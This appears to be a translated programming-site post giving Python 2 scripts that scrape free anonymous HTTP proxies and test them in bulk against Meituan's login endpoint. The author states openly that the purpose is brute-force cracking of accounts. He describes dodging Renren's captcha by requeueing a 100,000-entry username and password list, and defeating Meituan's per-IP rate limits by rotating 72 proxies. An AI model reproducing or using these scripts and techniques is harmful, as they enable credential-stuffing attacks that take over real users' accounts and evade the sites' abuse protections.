Of Stack

Get and validate the Python script for the HTTP agent in bulk

  • 2020-05-30 20:27:18
  • OfStack

Here are some common techniques for brute force cracking:

1. When scanning renren, I encountered a single account error twice, forcing me to enter the verification code, but the other party did not implement the IP policy.

I bypass the captcha by maintaining a 100,000 (username, password) queue. The specific approach is, when a user name, password combination encountered the need for verification code, the crack sequence suspended, placed at the end of the queue for the next test, continue to crack other account passwords.

This ensures that two-thirds of the time is spent doing normal cracking and scanning.

2. When cracking a certain system account on Meituan network, I encountered a certain limit on the access of a single IP, so the request frequency should not be too fast. So I hung up 72 HTTP agents to fix the problem. It seems that every IP request is normal, but in fact, from the whole process, the efficiency is considerable.

In this post I posted a script snippet of my own grab HTTP, which was actually only a few lines long. Anonymous proxy fetching from this: http: / / www xici. net. co/nn /

First get the list of agents: 


from bs4 import BeautifulSoup
import urllib2


of = open('proxy.txt' , 'w')

for page in range(1, 160):
  html_doc = urllib2.urlopen('http://www.xici.net.co/nn/' + str(page) ).read()
  soup = BeautifulSoup(html_doc)
  trs = soup.find('table', id='ip_list').find_all('tr')
  for tr in trs[1:]:
    tds = tr.find_all('td')
    ip = tds[1].text.strip()
    port = tds[2].text.strip()
    protocol = tds[5].text.strip()
    if protocol == 'HTTP' or protocol == 'HTTPS':
      of.write('%s=%s:%s\n' % (protocol, ip, port) )
      print '%s=%s:%s' % (protocol, ip, port)

of.close()

Then verify whether the agent is available, because I am used to crack the account of Meituan network system, so I use the page mark of Meituan: 


#encoding=gbk
import httplib
import time
import urllib
import threading

inFile = open('proxy.txt', 'r')
outFile = open('available.txt', 'w')

lock = threading.Lock()

def test():
  while True:
    lock.acquire()
    line = inFile.readline().strip()
    lock.release()
    if len(line) == 0: break
    protocol, proxy = line.split('=')
    headers = {'Content-Type': 'application/x-www-form-urlencoded',
      'Cookie': ''}
    try:
      conn = httplib.HTTPConnection(proxy, timeout=3.0)
      conn.request(method='POST', url='http://e.meituan.com/m/account/login', body='login=ttttttttttttttttttttttttttttttttttttt&password=bb&remember_username=1&auto_login=1', headers=headers )
      res = conn.getresponse()
      ret_headers = str( res.getheaders() ) 
      html_doc = res.read().decode('utf-8')
      print html_doc.encode('gbk')
      if ret_headers.find(u'/m/account/login/') > 0:
        lock.acquire()
        print 'add proxy', proxy
        outFile.write(proxy + '\n')
        lock.release()
      else:
        print '.',
    except Exception, e:
      print e

all_thread = []
for i in range(50):
  t = threading.Thread(target=test)
  all_thread.append(t)
  t.start()
  
for t in all_thread:
  t.join()

inFile.close()
outFile.close()

Related articles: